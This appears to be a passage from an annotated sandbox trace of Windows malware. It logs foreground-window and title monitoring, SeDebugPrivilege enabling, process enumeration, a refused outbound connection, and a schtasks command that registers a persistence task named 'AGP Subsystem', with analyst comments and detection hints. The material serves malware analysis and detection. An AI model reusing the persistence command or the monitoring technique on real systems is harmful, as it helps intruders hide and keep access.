[0172.228] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.233] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.233] LoadStringW (in: hInstance=0x3f0001, uID=0x141, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17
[0172.233] CoTaskMemFree (pv=0x10a67f8)
[0172.234] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.234] RegCloseKey (hKey=0x304) returned 0x0
# Analyst note: from this point the thread samples the foreground window
# (handle, owning thread id, keyboard layout, title text). The
# GetForegroundWindow/GetWindowTextW pair then repeats for the rest of this
# thread, mostly less than a second apart. No keystroke-capture API appears in
# this span, so treat the title/layout sampling as an indicator of window or
# input monitoring, not as proof of key logging.
[0173.002] GetForegroundWindow () returned 0x102a8
[0173.046] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0xc6c
# SeDebugPrivilege (LUID 0x14) is looked up and enabled on the process's own
# token: DesiredAccess=0x20 is TOKEN_ADJUST_PRIVILEGES and Attributes=0x2 is
# SE_PRIVILEGE_ENABLED. AdjustTokenPrivileges returns 1 even when the privilege
# is not actually assigned, and the trace records no GetLastError here, so the
# return value alone does not confirm the privilege was granted.
[0173.058] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x580f14c | out: lpLuid=0x580f14c*(LowPart=0x14, HighPart=0)) returned 1
[0173.059] GetCurrentProcess () returned 0xffffffff
[0173.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x580f148 | out: TokenHandle=0x580f148*=0x318) returned 1
[0173.060] AdjustTokenPrivileges (in: TokenHandle=0x318, DisableAllPrivileges=0, NewState=0x28f26c4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0173.060] CloseHandle (hObject=0x318) returned 1
# Process enumeration: EnumProcesses followed by NtQuerySystemInformation with
# class 0x5 (SystemProcessInformation). The same pair recurs later in this
# thread each time the foreground window handle changes (0x10116, 0x102a8,
# 0x3032a), presumably to resolve the process owning the new window; the
# returned data is not shown, so that purpose is an inference.
[0173.072] EnumProcesses (in: lpidProcess=0x28f2ea8, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x28f2ea8, lpcbNeeded=0x580f834) returned 1
[0173.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
# Keyboard layout of the thread that owns the foreground window; the low word
# 0x0409 is the en-US language identifier.
[0173.234] GetKeyboardLayout (idThread=0xc6c) returned 0x4090409
[0173.287] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.289] GetForegroundWindow () returned 0x102a8
[0173.289] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.367] GetForegroundWindow () returned 0x102a8
[0173.367] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.496] GetForegroundWindow () returned 0x102a8
[0173.496] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.684] GetForegroundWindow () returned 0x10116
[0173.684] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0x780
[0173.730] EnumProcesses (in: lpidProcess=0x290c0bc, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x290c0bc, lpcbNeeded=0x580f834) returned 1
[0173.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
[0173.739] GetKeyboardLayout (idThread=0x780) returned 0x4090409
[0173.740] GetWindowTextW (in: hWnd=0x10116, lpString=0x580f5f4, nMaxCount=256 | out: lpString="FolderView") returned 10
[0173.844] GetForegroundWindow () returned 0x102a8
[0173.844] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0xc6c
[0173.844] EnumProcesses (in: lpidProcess=0x2912b14, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x2912b14, lpcbNeeded=0x580f834) returned 1
[0173.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
[0173.850] GetKeyboardLayout (idThread=0xc6c) returned 0x4090409
[0173.850] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.250] GetForegroundWindow () returned 0x102a8
[0174.250] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.689] GetForegroundWindow () returned 0x102a8
[0174.689] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0175.028] GetForegroundWindow () returned 0x3032a
[0175.028] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0x7a4
[0175.028] EnumProcesses (in: lpidProcess=0x28cc1dc, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x28cc1dc, lpcbNeeded=0x580f834) returned 1
[0175.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcf20) returned 0x0
[0175.035] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0175.035] GetWindowTextW (in: hWnd=0x3032a, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0175.944] GetForegroundWindow () returned 0x3032a
[0175.944] GetWindowTextW (in: hWnd=0x3032a, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
Thread:
id = 43
os_tid = 0xd34
[0173.892] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0173.938] CoGetContextToken (in: pToken=0x59ef594 | out: pToken=0x59ef594) returned 0x0
[0173.938] CObjectContext::QueryInterface () returned 0x0
[0173.938] CObjectContext::GetCurrentThreadType () returned 0x0
[0173.938] Release () returned 0x0
[0173.938] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0173.938] CoUninitialize ()
[0173.993] GetForegroundWindow () returned 0x102a8
[0173.994] GetWindowTextW (in: hWnd=0x102a8, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0174.168] GetForegroundWindow () returned 0x102a8
[0174.168] GetWindowTextW (in: hWnd=0x102a8, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0176.108] GetForegroundWindow () returned 0x3032a
[0176.108] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.206] GetForegroundWindow () returned 0x3032a
[0176.206] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.389] GetForegroundWindow () returned 0x3032a
[0176.390] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.466] GetForegroundWindow () returned 0x3032a
[0176.466] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.538] GetForegroundWindow () returned 0x3032a
[0176.538] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.621] GetForegroundWindow () returned 0x3032a
[0176.621] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.689] GetForegroundWindow () returned 0x3032a
[0176.689] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.778] GetForegroundWindow () returned 0x0
[0176.778] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0176.778] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0176.838] GetForegroundWindow () returned 0x3032a
[0176.838] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0176.839] EnumProcesses (in: lpidProcess=0x28dcdf8, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28dcdf8, lpcbNeeded=0x59ef114) returned 1
[0176.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfa0) returned 0x0
[0176.847] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0176.848] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.925] GetForegroundWindow () returned 0x3032a
[0176.925] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0176.993] GetForegroundWindow () returned 0x3032a
[0176.993] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.058] GetForegroundWindow () returned 0x3032a
[0177.058] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.120] GetForegroundWindow () returned 0x0
[0177.120] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0177.120] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0177.183] GetForegroundWindow () returned 0x3032a
[0177.183] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0177.183] EnumProcesses (in: lpidProcess=0x28e46fc, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28e46fc, lpcbNeeded=0x59ef114) returned 1
[0177.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfe0) returned 0x0
[0177.189] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0177.189] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.254] GetForegroundWindow () returned 0x3032a
[0177.254] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.318] GetForegroundWindow () returned 0x3032a
[0177.318] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.380] GetForegroundWindow () returned 0x3032a
[0177.380] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.524] GetForegroundWindow () returned 0x0
[0177.703] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0177.703] GetWindowTextW (in: hWnd=0x0, lpString=0x59eeed4, nMaxCount=256 | out: lpString="") returned 0
[0177.704] GetForegroundWindow () returned 0x3032a
[0177.704] GetWindowThreadProcessId (in: hWnd=0x3032a, lpdwProcessId=0x59ef158 | out: lpdwProcessId=0x59ef158) returned 0x7a4
[0177.704] EnumProcesses (in: lpidProcess=0x28ec020, cb=0x400, lpcbNeeded=0x59ef114 | out: lpidProcess=0x28ec020, lpcbNeeded=0x59ef114) returned 1
[0177.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x59ef0e0 | out: SystemInformation=0x38c18e8, ResultLength=0x59ef0e0*=0xcfe0) returned 0x0
[0177.711] GetKeyboardLayout (idThread=0x7a4) returned 0x4090409
[0177.711] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0177.856] GetForegroundWindow () returned 0x3032a
[0178.081] GetWindowTextW (in: hWnd=0x3032a, lpString=0x59eeed4, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
Thread:
id = 44
os_tid = 0xd38
# Analyst note: short-lived thread that initialises COM and then handles the
# completion of an overlapped socket operation that failed.
Thread:
id = 45
os_tid = 0x888
[0176.454] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0176.454] CoGetContextToken (in: pToken=0x5b0f6dc | out: pToken=0x5b0f6dc) returned 0x0
[0176.454] CObjectContext::QueryInterface () returned 0x0
[0176.454] CObjectContext::GetCurrentThreadType () returned 0x0
[0176.454] Release () returned 0x0
[0176.454] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0176.454] CoUninitialize ()
# WSAGetOverlappedResult returns 0 (failure) for socket 0x348. The error is
# then formatted: dwMessageId 0x274d is 10061 (WSAECONNREFUSED), i.e. an
# outbound connection attempt was refused by the peer. The remote address and
# port are not recorded in these calls; take them from the connect call or the
# network capture of the same run.
[0177.770] WSAGetOverlappedResult (in: s=0x348, lpOverlapped=0x28cc11c, lpcbTransfer=0x5b0f4a4, fWait=0, lpdwFlags=0x5b0f478 | out: lpcbTransfer=0x5b0f4a4, lpdwFlags=0x5b0f478) returned 0
[0177.840] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, lpBuffer=0x5b0f0bc, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d
# The handle value 0x348 is released here and shows up again as a file handle
# for settings.bin at [0179.928] in another thread. Correlate by timestamp and
# API, not by handle value alone.
[0177.915] closesocket (s=0x348) returned 0
# Analyst note: child process that registers a scheduled task (persistence,
# MITRE ATT&CK T1053.005). The command line below creates (/create) or
# overwrites (/f) a task named "AGP Subsystem" from an XML definition in the
# user's Temp directory. The task's trigger and action are in that XML and are
# not visible in this record; recover tmpFD29.tmp from the analysis artifacts
# or inspect the registered task to see what it launches.
# Detection: schtasks.exe /create with /xml pointing into a user Temp path;
# task registration also surfaces as Security event 4698 (when object-access
# auditing is enabled) and TaskScheduler/Operational event 106.
Process:
id = "5"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3b6cd000"
os_pid = "0x7d0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
# parent_id 4 / os_parent_pid 0x830: the parent's own Process record is not in
# this part of the log, so the launching image must be confirmed there.
parent_id = "4"
os_parent_pid = "0x830"
cmd_line = "\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1893
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1894
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1895
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1896
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1897
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1898
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1899
start_va = 0x250000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1900
start_va = 0x2c0000
end_va = 0x2edfff
monitored = 1
entry_point = 0x2d7683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1901
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1902
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1903
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1904
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1905
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1906
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1907
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1908
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1909
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1910
start_va = 0xe0000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1911
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1912
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1913
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1914
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1915
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1916
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1917
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1918
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1919
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1920
start_va = 0x2f0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 1921
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1922
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1923
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1924
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1925
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1938
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1939
start_va = 0x160000
end_va = 0x1c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1940
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1941
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1942
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1943
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1944
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1945
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1946
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1947
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1948
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1949
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1950
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1951
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1952
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1953
start_va = 0x6f7a0000
end_va = 0x6f7a8fff
monitored = 0
entry_point = 0x6f7a1830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 1954
start_va = 0x3f0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1955
start_va = 0x3f0000
end_va = 0x577fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 1956
start_va = 0x5a0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1957
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1958
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1959
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1960
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1961
start_va = 0x5b0000
end_va = 0x730fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005b0000"
filename = ""
Region:
id = 1962
start_va = 0x740000
end_va = 0x1b3ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1963
start_va = 0x70000
end_va = 0x81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 1964
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1965
start_va = 0x90000
end_va = 0x90fff
monitored = 1
